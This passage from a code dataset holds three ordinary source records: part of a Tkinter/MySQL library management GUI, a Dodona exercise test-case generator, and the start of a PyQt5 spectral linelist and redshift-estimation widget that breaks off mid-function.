bg='dark violet', relief=RIDGE,\r\n width=8, borderwidth=5, bd=4, activebackground='red', activeforeground='white', command=addDB)\r\n subButton.place(x=180, y=410)\r\n adddb.mainloop()\r\n\r\n\r\n def showData():\r\n try:\r\n command = 'select * from library'\r\n mycursor.execute(command)\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n except:\r\n messagebox.showinfo('Error!','Please Connect to the Database!')\r\n\r\n def searchData():\r\n def searchsql():\r\n studentid = sidvalue.get()\r\n studentname = snamevalue.get()\r\n bookname = sbnvalue.get()\r\n bookid = sbidvalue.get()\r\n authorname = sauthvalue.get()\r\n borrowdate = sbdvalue.get()\r\n returndate = srnvalue.get()\r\n \r\n if (studentid != ''):\r\n command = 'select * from library where student_id = %s'\r\n mycursor.execute(command, (studentid, ))\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n \r\n elif (studentname != ''):\r\n command = 'select * from library where student_name = %s'\r\n mycursor.execute(command, (studentname, ))\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n\r\n elif (bookname != ''):\r\n command = 'select * from library where book_name = %s'\r\n mycursor.execute(command, (bookname, ))\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n\r\n elif (bookid != ''):\r\n command = 'select * from library where book_id = %s'\r\n mycursor.execute(command, (bookid, ))\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n\r\n elif (authorname != ''):\r\n command = 'select * from library where author_name = %s'\r\n mycursor.execute(command, (authorname, ))\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n\r\n elif (borrowdate != ''):\r\n command = 'select * from library where borrow_date = %s'\r\n mycursor.execute(command, (borrowdate, ))\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n\r\n elif (returndate != ''):\r\n command = 'select * from library where return_date = %s'\r\n mycursor.execute(command, (returndate, ))\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n\r\n searchdb = Toplevel(master=dataEntryFrame)\r\n searchdb.title(\"Search Book's Data\")\r\n searchdb.config(bg='maroon2')\r\n searchdb.grab_set()\r\n searchdb.resizable(False, False)\r\n searchdb.geometry(\"470x470+220+200\")\r\n ####DATA STUFFS####\r\n\r\n ### Admn No DETAILS ###\r\n sidvalue = StringVar()\r\n sidLabel = Label(searchdb, text=\"Search Admn No:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='blue2', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n sidLabel.place(x=10, y=10)\r\n sidEntry = Entry(searchdb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=sidvalue)\r\n sidEntry.place(x=230, y=10)\r\n\r\n ### Name DETAILS ###\r\n snamevalue = StringVar()\r\n snameLabel = Label(searchdb, text=\"Search Name:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='blue2', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n snameLabel.place(x=10, y=70)\r\n snameEntry = Entry(searchdb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=snamevalue)\r\n snameEntry.place(x=230, y=70)\r\n\r\n ### Book Name DETAILS ###\r\n sbnvalue = StringVar()\r\n sbnLabel = Label(searchdb, text=\"Search Book Name:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='blue2', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n sbnLabel.place(x=10, y=130)\r\n sbnEntry = Entry(searchdb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=sbnvalue)\r\n sbnEntry.place(x=230, y=130)\r\n\r\n ### Book ID DETAILS ###\r\n sbidvalue = StringVar()\r\n sbidLabel = Label(searchdb, text=\"Search Book ID:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='blue2', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n sbidLabel.place(x=10, y=190)\r\n sbidEntry = Entry(searchdb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=sbidvalue)\r\n sbidEntry.place(x=230, y=190)\r\n\r\n ### Author Name DETAILS ###\r\n sauthvalue = StringVar()\r\n sauthLabel = Label(searchdb, text=\"Search Author Name:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='blue2', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n sauthLabel.place(x=10, y=250)\r\n sauthEntry = Entry(searchdb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=sauthvalue)\r\n sauthEntry.place(x=230, y=250)\r\n\r\n ### Borrow Date DETAILS ###\r\n sbdvalue = StringVar()\r\n sbdLabel = Label(searchdb, text=\"Search Borrow Date:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='blue2', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n sbdLabel.place(x=10, y=310)\r\n sbdEntry = Entry(searchdb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=sbdvalue)\r\n sbdEntry.place(x=230, y=310)\r\n\r\n ### Return Date DETIALS ###\r\n srnvalue = StringVar()\r\n srnLabel = Label(searchdb, text=\"Search Return Date:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='blue2', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n srnLabel.place(x=10, y=370)\r\n srnEntry = Entry(searchdb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=srnvalue)\r\n srnEntry.place(x=230, y=370)\r\n\r\n ### SUBMIT ###\r\n ssubButton = Button(searchdb, text=\"Search\", font=('Helvetica', 15, 'italic bold'), bg='blue2', relief=RIDGE,\r\n width=8, borderwidth=5, bd=4, activebackground='red', activeforeground='white', command=searchsql)\r\n ssubButton.place(x=180, y=410)\r\n searchdb.mainloop()\r\n pass\r\n\r\n\r\n def updateData():\r\n\r\n def update():\r\n studentid = uidvalue.get()\r\n studentname = unamevalue.get()\r\n bookname = ubnvalue.get()\r\n bookid = ubidvalue.get()\r\n authorname = uauthvalue.get()\r\n borrowdate = ubdvalue.get()\r\n returndate = urdvalue.get()\r\n try: \r\n command = 'update library set student_name=%s,book_name=%s,book_id=%s,author_name=%s,borrow_date=%s,return_date=%s where student_id=%s'\r\n mycursor.execute(command,(studentname,bookname,bookid,authorname,borrowdate,returndate,studentid, ))\r\n con.commit()\r\n messagebox.showinfo('Success!','Updated Successfully!')\r\n updatedb.destroy()\r\n\r\n command = 'select * from library'\r\n mycursor.execute(command)\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n \r\n \r\n except:\r\n messagebox.showinfo('Error!','Please Connect to the Database!')\r\n \r\n updatedb = Toplevel(master=dataEntryFrame)\r\n updatedb.title(\"Update Library's Data\")\r\n updatedb.config(bg='gold2')\r\n updatedb.grab_set()\r\n updatedb.resizable(False, False)\r\n updatedb.geometry(\"470x470+220+200\")\r\n\r\n ### Admn No DETAILS ###\r\n\r\n uidvalue = StringVar()\r\n uidLabel = Label(updatedb, text=\"Update Admn No:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='cyan', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n uidLabel.place(x=10, y=10)\r\n uidEntry = Entry(updatedb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=uidvalue)\r\n uidEntry.place(x=230, y=10)\r\n\r\n ### Name DETAILS ###\r\n unamevalue = StringVar()\r\n unameLabel = Label(updatedb, text=\"Update Name:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='cyan', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n unameLabel.place(x=10, y=70)\r\n unameEntry = Entry(updatedb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=unamevalue)\r\n unameEntry.place(x=230, y=70)\r\n\r\n ### PHONE NEUMBER DETAILS ###\r\n ubnvalue = StringVar()\r\n ubnLabel = Label(updatedb, text=\"Update Book Name:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='cyan', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n ubnLabel.place(x=10, y=130)\r\n ubnEntry = Entry(updatedb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=ubnvalue)\r\n ubnEntry.place(x=230, y=130)\r\n\r\n ### DATE OF BIRTH DETAILS ###\r\n ubidvalue = StringVar()\r\n ubidLabel = Label(updatedb, text=\"Update Book ID:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='cyan', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n ubidLabel.place(x=10, y=190)\r\n ubidEntry = Entry(updatedb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=ubidvalue)\r\n ubidEntry.place(x=230, y=190)\r\n\r\n ### BLOOD GROUP DETAILS ###\r\n uauthvalue = StringVar()\r\n uauthLabel = Label(updatedb, text=\"Update Author Name:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='cyan', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n uauthLabel.place(x=10, y=250)\r\n uauthEntry = Entry(updatedb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=uauthvalue)\r\n uauthEntry.place(x=230, y=250)\r\n\r\n ### MOTHER NAME DETAILS ###\r\n ubdvalue = StringVar()\r\n ubdLabel = Label(updatedb, text=\"Update Borrow Date:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='cyan', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n ubdLabel.place(x=10, y=310)\r\n ubdEntry = Entry(updatedb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=ubdvalue)\r\n ubdEntry.place(x=230, y=310)\r\n\r\n ### FATHER NAME DETIALS ###\r\n urdvalue = StringVar()\r\n urdLabel = Label(updatedb, text=\"Update Return Date:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='cyan', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n urdLabel.place(x=10, y=370)\r\n urdEntry = Entry(updatedb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=urdvalue)\r\n urdEntry.place(x=230, y=370)\r\n\r\n ### SUBMIT ###\r\n usubButton = Button(updatedb, text=\"Update\", font=('Helvetica', 15, 'italic bold'), bg='cyan',\r\n relief=RIDGE, width=8, borderwidth=5, bd=4, activebackground='red', activeforeground='white',command=update)\r\n usubButton.place(x=180, y=410)\r\n a = contenttable.focus()\r\n data = contenttable.item(a)\r\n b = data['values']\r\n if len(b) != 0:\r\n uidvalue.set(b[0])\r\n unamevalue.set(b[1])\r\n ubnvalue.set(b[2])\r\n ubidvalue.set(b[3])\r\n uauthvalue.set(b[4])\r\n ubdvalue.set(b[5])\r\n urdvalue.set(b[6])\r\n\r\n updatedb.mainloop()\r\n\r\n pass\r\n\r\n\r\n def deleteData():\r\n \r\n a = contenttable.focus()\r\n data = contenttable.item(a)\r\n b = data['values'][0]\r\n command = 'delete from library where student_id=%s'\r\n mycursor.execute(command,(b, ))\r\n con.commit()\r\n command = 'select * from library'\r\n mycursor.execute(command)\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n \r\n messagebox.showinfo('Success!','Deleted Successfully!')\r\n\r\n def export():\r\n a = filedialog.asksaveasfilename()\r\n b = contenttable.get_children()\r\n id,name,bid,bname,authrname,bordat,retdat= [],[],[],[],[],[],[]\r\n for i in b:\r\n contents = contenttable.item(i)\r\n c = contents['values']\r\n id.append(c[0]),name.append(c[1]),bid.append(c[2]),bname.append(c[3]),authrname.append(c[4]),bordat.append(c[5]),retdat.append(c[6])\r\n cols = ['Admn No','Name','Book ID','Book Name','Author Name','Borrow Date','Return Date']\r\n fin = DataFrame(list(zip(id,name,bid,bname,authrname,bordat,retdat)),columns=cols)\r\n path = a+'.csv'\r\n fin.to_csv(path,index=False)\r\n messagebox.showinfo('Success!','Student Data Saved Successfully! {} '.format(path))\r\n \r\n \r\n\r\n\r\n root = Toplevel()\r\n root.title(\"LIBRARY MANAGEMENT SYSTEM\")\r\n root.geometry('1174x700+150+2')\r\n root.config(bg =\"#7395AE\")\r\n root.resizable(False,False)\r\n\r\n ### HEADING FRAME ###\r\n headingFrame = Frame(root, bg = \"Black\", relief = RIDGE,)\r\n headingFrame.place(x=0, y=0, width=1174, height=110)\r\n\r\n head = \"ZESCA\"\r\n headLabel = Label(headingFrame, text=head, fg=\"#FFFFFF\", font=(\r\n 'Elianto', 40),bg='Black')\r\n headLabel.place(x=26, y=20) \r\n\r\n dataEntryFrame = Frame(root , bg = 'Cyan' , relief = RIDGE, )\r\n dataEntryFrame.place(x=0,y=110,width=330,height=620)\r\n\r\n \r\n \r\n addDataButton = Button(dataEntryFrame, text=\"Add Book\", font=('Hero', 20), bg='white', relief=FLAT,\r\n width=13, command = addData)\r\n addDataButton.pack(side=TOP, expand=True)\r\n showallButton = Button(dataEntryFrame, text=\"Show All\", font=('Hero', 20), bg='white', relief=FLAT,\r\n width=13, command=showData)\r\n showallButton.pack(side=TOP, expand=True)\r\n searchDataButton = Button(dataEntryFrame, text=\"Search Book\", font=('Hero', 20), bg='white',\r\n relief=FLAT, width=13, command=searchData)\r\n searchDataButton.pack(side=TOP, expand=True)\r\n updateDataButton = Button(dataEntryFrame, text=\"Update Book\", font=('Hero', 20), bg='white',\r\n relief=FLAT, width=13, command=updateData)\r\n updateDataButton.pack(side=TOP, expand=True)\r\n deleteDataButton = Button(dataEntryFrame, text=\"Delete Book\", font=('Hero', 20), bg='white',\r\n relief=FLAT, width=13, command=deleteData)\r\n deleteDataButton.pack(side=TOP, expand=True)\r\n exportButton = Button(dataEntryFrame, text=\"Export\", font=('Hero', 20), bg='white', relief=FLAT,\r\n width=13, command=export)\r\n exportButton.pack(side=TOP, expand=True)\r\n\r\n\r\n ####SHOW CONTENT STUFF####\r\n showFrame = Frame(root, bg='black', relief=FLAT, borderwidth=3)\r\n showFrame.place(x=330, y=110, width=845, height=590)\r\n xScrollBar = Scrollbar(showFrame, orient=HORIZONTAL)\r\n yScrollBar = Scrollbar(showFrame, orient=VERTICAL)\r\n contenttable = Treeview(showFrame, columns=('Admn No', 'Name', 'Book Name', 'Book ID', 'Author Name',\r\n 'Borrow Date', 'Return Date'), yscrollcommand=yScrollBar.set, xscrollcommand=xScrollBar.set)\r\n\r\n ### STYLING STUFFS ###\r\n style = ttk.Style()\r\n style.configure('Treeview.Heading',font=('times',15,'bold'),foreground='black')\r\n style.configure('Treeview',font=('times',15,'bold'),background='black',foreground='cyan',rowheight=30)\r\n\r\n xScrollBar.pack(side=BOTTOM, fill=X)\r\n yScrollBar.pack(side=RIGHT, fill=Y)\r\n xScrollBar.config(command=contenttable.xview)\r\n yScrollBar.config(command=contenttable.yview)\r\n contenttable.heading('Admn No', text='Admn No')\r\n contenttable.heading('Name', text='Name')\r\n contenttable.heading('Book Name', text='Book Name')\r\n contenttable.heading('Book ID', text='Book ID')\r\n contenttable.heading('Author Name', text='Author Name')\r\n contenttable.heading('Borrow Date', text='Borrow Date')\r\n contenttable.heading('Return Date', text='Return Date')\r\n ### SIZE STUFFS ###\r\n contenttable.column('Admn No', width=150)\r\n contenttable.column('Name', width=250)\r\n contenttable.column('Book Name', width=200)\r\n contenttable.column('Book ID', width=150)\r\n contenttable.column('Author Name', width=170)\r\n contenttable.column('Borrow Date', width=250)\r\n contenttable.column('Return Date', width=250)\r\n\r\n contenttable['show'] = 'headings'\r\n contenttable.pack(fill=BOTH, expand=2)\r\n\r\n\r\n ####HEADING STUFFS####\r\n txt = \"WELCOME TO LIBRARY MANAGEMENT SYSTEM\"\r\n \r\n headLabel = Label(root, text=txt, font=('Elianto', 20, 'italic bold'),\r\n bg=\"Black\", relief=FLAT, width=45,foreground='black')\r\n headLabel.place(x=240, y=40)\r\n colors = [ 'snow', 'peach puff', 'yellow', 'ivory','black','green','pink','purple','blue','lime','orange']\r\n\r\n\r\n def headColor():\r\n fg = choice(colors)\r\n headLabel.config(fg=fg)\r\n headLabel.after(25, headColor)\r\n # headSlider()\r\n headColor()\r\n ####CONNECT BUTTON####\r\n connectButton = Button(root, text=\"Connect to DB\", font=('Hero', 15), bg='cyan', relief=FLAT,\r\n width=15 ,command=connectDB)\r\n connectButton.place(x=980, y=0)\r\n ####TEAM MEMBERS LIST####\r\n ## relief=RIDGE, width=15, borderwidth=5, bd=4, activebackground='red', activeforeground='white')\r\n #teamButton.place(x=0, y=0)\r\n root.mainloop()\r\n\r\n\r\n\r\n","repo_name":"OxOv3rH4uL/SCHOOL-MANAGEMENT-SYSTEM-GUI","sub_path":"library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":27972,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"72813916907","text":"import os\nimport sys\nimport importlib\nimport random\n\n# set fixed seed for generating test cases\nrandom.seed(123456789)\n\n# locate evaldir\nevaldir = os.path.join('..', 'evaluation')\nif not os.path.exists(evaldir):\n os.makedirs(evaldir)\n\n# locate solutiondir\nsolutiondir = os.path.join('..', 'solution')\nif not os.path.exists(solutiondir):\n os.makedirs(solutiondir)\n\n# load functionality defined in sample solution\nmodule_name = 'solution'\nfile_path = os.path.join(solutiondir, 'solution.en.py')\nspec = importlib.util.spec_from_file_location(module_name, file_path)\nmodule = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(module)\n\nfor name in dir(module):\n if not (name.startswith('__') and name.endswith('__')):\n globals()[name] = eval(f'module.{name}')\n\n# generate test data for function multiplication table\ncases = {\n 'en': [\n ('bee', 'tween'),\n ],\n 'nl': [\n ('een', 'twee'),\n ]\n}\nlanguages = list(cases)\n\n# generate unit tests for function common_characters\nsys.stdout = open(os.path.join('..', 'evaluation', '0.in'), 'w', encoding='utf-8')\nfor language in languages:\n for index, (word1, word2) in enumerate(cases[language]):\n\n # generate test expression\n print(f'>>> common_characters({word1!r}, {word2!r})')\n if not index:\n print(f'')\n\n # generate return value\n try:\n print(f'{common_characters(word1, word2)!r}')\n except Exception as e:\n print('Traceback (most recent call last):\\n{}: {}'.format(e.__class__.__name__, e))\n\n print()\n","repo_name":"dodona-edu/programmeursleerling","sub_path":"chapters/08 functions/08 exercises/02 common characters/preparation/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"41446735335","text":"import sys\nimport os\nimport pandas as pd\nfrom numpy import floor, log10, isnan, nan, isinf\n\nfrom PyQt5.QtWidgets import QWidget, QVBoxLayout, QHBoxLayout, QGridLayout, QLabel, QComboBox, QLineEdit, QPushButton, QCheckBox\nfrom PyQt5.QtCore import pyqtSignal\n\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtGui\nfrom PyQt5.QtGui import QDoubleValidator\n\nfrom IGM.rb_setline import read_line_list\n\nLINELIST_DIR = os.path.dirname(os.path.abspath(__file__))\n\n# This widget includes the primary linelist, redshift estimation\n# and secondary linelists.\n# Since this class has complicated structure in terms of widget composition,\n# only import useful modules/functions to avoid slow-down running time\nclass LineListWidget(QWidget):\n\t# Linelist constant\n\t# only need to update this one\n\tLINELISTS = ['NONE']\n\twith open(LINELIST_DIR+'/gui_linelists.ascii') as f:\n\t\tnext(f)\n\t\tfor line in f:\n\t\t\tLINELISTS.append(line.strip())\n\n\t# check function _get_linelist_df if any error showed up\n\n\t# Exporting signals\n\tsend_lineindex = pyqtSignal(int)\n\tsend_linelist = pyqtSignal(object)\n\tsend_more_linelist = pyqtSignal(object)\n\tsend_more_linelist_z = pyqtSignal(object)\n\tsend_data = pyqtSignal(object)\n\tsend_gauss_num = pyqtSignal(int)\n\tsend_message = pyqtSignal(str)\n\tsend_z_returnPressed = pyqtSignal(float)\n\tsend_linelists2multiG = pyqtSignal(list)\n\n\t# initialization - widget layout\n\tdef __init__(self):\n\t\tsuper().__init__()\n\n\t\t#internal values\n\t\tself.linelist = []\n\t\tself.filename = ''\n\t\tself.filenames = []\n\t\tself.newz = []\n\n\t\t# Main(Grand) widget layout\n\t\tglayout = QVBoxLayout()\n\n\t\t# Widget column names\n\t\tlayout = QGridLayout()\n\t\tlayout.addWidget(QLabel('LineList Name'), 0, 0)\n\t\tlayout.addWidget(QLabel('Ion Name'), 0, 1)\n\t\tlayout.addWidget(QLabel('#Gauss'), 0, 2)\n\t\tlayout.addWidget(QLabel('Estimated z'), 0, 3)\n\t\tlayout.addWidget(QLabel('z error'), 0, 4)\n\t\tlayout.addWidget(QLabel('Confidence'), 0, 5)\n\t\tlayout.addWidget(QLabel('Flag'), 0, 6)\n\n\t\t# linelist combobox\n\t\tself.l_lln = QComboBox()\n\t\tself.l_lln.setFixedWidth(120)\n\t\tself.l_lln.addItems(self.LINELISTS)\n\t\tlayout.addWidget(self.l_lln, 1, 0)\n\t\t# selecting a linelist in linelists box triggers another action\n\t\tself.l_lln.currentTextChanged.connect(self._linelist_changed)\n\n\t\t# Ion Names in this selected line-list\n\t\t# Note: 'ALL' is in index 0\n\t\tself.l_combobox = QComboBox()\n\t\tself.l_combobox.setFixedWidth(150)\n\t\tlayout.addWidget(self.l_combobox, 1, 1)\n\t\tself.l_combobox.addItem('NONE')\n\t\tself.l_combobox.setCurrentIndex(0)\n\t\t# selecting an ion in a linelist triggers another action\n\t\tself.l_combobox.currentIndexChanged.connect(self._index_changed)\n\t\t#self.l_combobox.currentTextChanged.connect(self._text_changed)\n\n\t\t# Number of Gaussian specified\n\t\tself.gauss_num = QComboBox()\n\t\tself.gauss_num.setFixedWidth(50)\n\t\tself.gauss_num.addItems(['0', '1', '2', '3'])\n\t\tself.gauss_num.setCurrentIndex(1)\n\t\t# selecting a number of the box triggers another action\n\t\tself.gauss_num.activated.connect(self._on_gauss_num_activated)\n\t\tlayout.addWidget(self.gauss_num, 1,2)\n\n\t\t# User-input textboxes\n\t\t# this validator only allows user to type numbers\n\t\tself.onlyFloat = QDoubleValidator()\n\t\t# Estimated redshift\n\t\tself.estZ = QLineEdit()\n\t\tself.estZ.setPlaceholderText('Guess redshift')\n\t\tself.estZ.setMaximumWidth(100)\n\t\tself.estZ.setValidator(self.onlyFloat)\n\t\t# pressing return button triggers another action\n\t\tself.estZ.returnPressed.connect(self._on_z_return_pressed)\n\t\t# Errors in estimated redshift\n\t\tself.estZstd = QLineEdit()\n\t\tself.estZstd.setPlaceholderText('z Error')\n\t\tself.estZstd.setMaximumWidth(100)\n\t\tself.estZstd.setValidator(self.onlyFloat)\n\t\tself.estZstd.setReadOnly(True)\n\t\t# Confidence level\n\t\tself.conf = QLineEdit()\n\t\tself.conf.setPlaceholderText('[0, 1.]')\n\t\tself.conf.setMaximumWidth(150)\n\t\tself.conf_onlyFloat = QDoubleValidator(bottom=0., \n\t\t\t\t\t\t\t\t\t\t\t\ttop=1., \n\t\t\t\t\t\t\t\t\t\t\t\tdecimals=3,\n\t\t\t\t\t\t\t\t\t\t\t\tnotation=QDoubleValidator.StandardNotation)\n\t\tself.conf.setValidator(self.conf_onlyFloat)\n\t\t# Flags/Comments on this\n\t\tself.flag = QLineEdit()\n\t\tself.flag.setPlaceholderText('Additional Info?')\n\n\t\t# Button to save current estimation to table/database\n\t\tbutton = QPushButton('Add to Table below')\n\t\t# clicking button triggers another action\n\t\tbutton.clicked.connect(self._on_button_clicked)\n\n\n\t\tlayout.addWidget(self.estZ, 1,3)\n\t\tlayout.addWidget(self.estZstd, 1, 4)\n\t\tlayout.addWidget(self.conf, 1,5)\n\t\tlayout.addWidget(self.flag, 1,6)\n\t\tlayout.addWidget(button, 1,7)\n\n\t\t# Secondary linelists\n\t\tl_checkbox = QCheckBox('Add More Linelists to Examine..')\n\t\t# only triggers to set up more secondary linelist when checked\n\t\tl_checkbox.stateChanged.connect(self._intialize_more_linelist)\n\t\tl_hlayout = QHBoxLayout()\n\n\t\t# Number of secondary linelists needed\n\t\tnum_llists = 6\n\t\tself.llists_2 = []\n\t\tfor i in range(num_llists):\n\t\t\tself.llists_2.append(self.add_linelists())\n\t\t\t#indices for llists_2:\n\t\t\t# 0-layout, 1-linelist combobox, 2-z lineedit\n\t\t\tl_hlayout.addLayout(self.llists_2[i][0])\n\n\n\t\tglayout.addLayout(layout)\n\t\tglayout.addWidget(l_checkbox)\n\t\tglayout.addLayout(l_hlayout)\n\t\t\n\t\tglayout.setAlignment(QtCore.Qt.AlignTop | QtCore.Qt.AlignLeft)\n\t\tself.setLayout(glayout)\n\t\tself.setFixedHeight(150)\n\n\t# utility function to set up secondary linelist\n\tdef add_linelists(self):\n\t\tll_layout = QGridLayout()\n\t\tl_combox = QComboBox()\n\n\t\tl_combox.setFixedWidth(80)\n\t\tz_edit = QLineEdit()\n\t\tz_edit.setPlaceholderText('Guess z')\n\t\tz_edit.setReadOnly(True)\n\t\tz_edit.setMaximumWidth(60)\n\t\t#ll_layout.addWidget(QLabel('Linelist'), 0,0)\n\t\t#ll_layout.addWidget(QLabel('Guess z'), 0,1)\n\t\tll_layout.addWidget(l_combox, 0,0)\n\t\tll_layout.addWidget(z_edit, 0,1)\n\t\tll_layout.setAlignment(QtCore.Qt.AlignLeft)\n\n\t\treturn ll_layout, l_combox, z_edit\n\n\t# intialize secondary linelist sytles\n\tdef _intialize_more_linelist(self, s):\n\t\t# if the checkbox is checked, initialize secondary linelists\n\t\tif s == QtCore.Qt.Checked:\n\t\t\t# initialize more linelists for plotting\n\t\t\tcolors = ['#A52A2A', '#FF7F50', '#40E0D0', '#DAA520', '#008000', '#4B0082']\n\t\t\tfor i in range(len(self.llists_2)):\n\t\t\t\tself.llists_2[i][1].addItems(self.LINELISTS)\n\t\t\t\tt_color = 'QComboBox {color:' + colors[i] + '}'\n\t\t\t\tself.llists_2[i][1].setStyleSheet(t_color)\n\t\t\t\t# 2 parameters need to be passed: 1.selected linelist and 2.index of linelist widget changed\n\t\t\t\tself.llists_2[i][1].currentTextChanged.connect(lambda s, idx=i: self._addtional_linelist(idx, s))\n\t\t\t\t\n\t\t\t\tself.llists_2[i][2].setReadOnly(False)\n\t\t\t\t# only the index of linelist widget passed\n\t\t\t\tself.llists_2[i][2].returnPressed.connect(lambda idx=i: self._guess_z_return_pressed(idx))\n\t\telse:\n\t\t\t# if checkbox is unchecked, grey out all things\n\t\t\tfor i in range(len(self.llists_2)):\n\t\t\t\tself.llists_2[i][1].clear()\n\t\t\t\tself.llists_2[i][2].clear()\n\t\t\t\tself.llists_2[i][2].setReadOnly(True)\n\t\t\t\n\t# action to press return button on estZ LineEdit\n\tdef _on_z_return_pressed(self):\n\t\tself.send_z_returnPressed.emit(float(self.estZ.text()))\n\t\tif self.gauss_num.currentIndex() < 1:\n\t\t\tself.estZstd.setText('nan')\n\t\t\t# this will not changed the default self.newz values\n\n\t# importing signal(linelist name) to slot\n\tdef on_linelist_name_slot(self, sent_linelist_name):\n\t\tself.l_lln.setText(sent_linelist_name)\n\tdef on_linelist_slot(self, sent_linelist):\n\t\tself.linelist = sent_linelist\n\t\t#self.l_combobox.addItems(['NONE', 'ALL'] + self.linelist['name'].tolist())\n\t\t#print(self.linelist)\n\n\t# ion line combobox events\n\tdef _index_changed(self, i): # i is an int\n\t\tself.send_lineindex.emit(i)\n\n\tdef _text_changed(self, s): # s is a str\n\t\ttmp_df = self.linelist.set_index('name')\n\n\t# Display all available ions in a selected linelist\n\tdef _linelist_changed(self, s):\n\t\tif s in 'NONE':\n\t\t\tself.send_linelist.emit(s)\n\t\t\tself.l_combobox.clear()\n\t\t\tself.l_combobox.addItem('NONE')\n\t\t\tself.l_combobox.setCurrentIndex(0)\n\t\telse:\n\t\t\tllist = self._get_linelist_df(s)\n\t\t\tself.linelist = llist\n\n\t\t\tself.l_combobox.addItems(['ALL'] + self.linelist['name'].tolist())\n\t\t\tself.send_linelist.emit(self.linelist)\n\t\t\tself.l_combobox.setCurrentIndex(1)\n\n\t# display estimated redshifts and error\n\t# with specified significant figures\n\tdef _on_estZ_changed(self, newz):\n\t\tshow_sigfig = 5\n\t\tself.newz = newz\n\t\tif not isnan(float(self.newz[0])):\n\t\t\tself.estZ.setText(str(self.round_to_sigfig(newz[0], show_sigfig)))\n\t\t\tif self.gauss_num.currentIndex() > 0:\n\t\t\t\t# Except for manually guessing z (i.e., 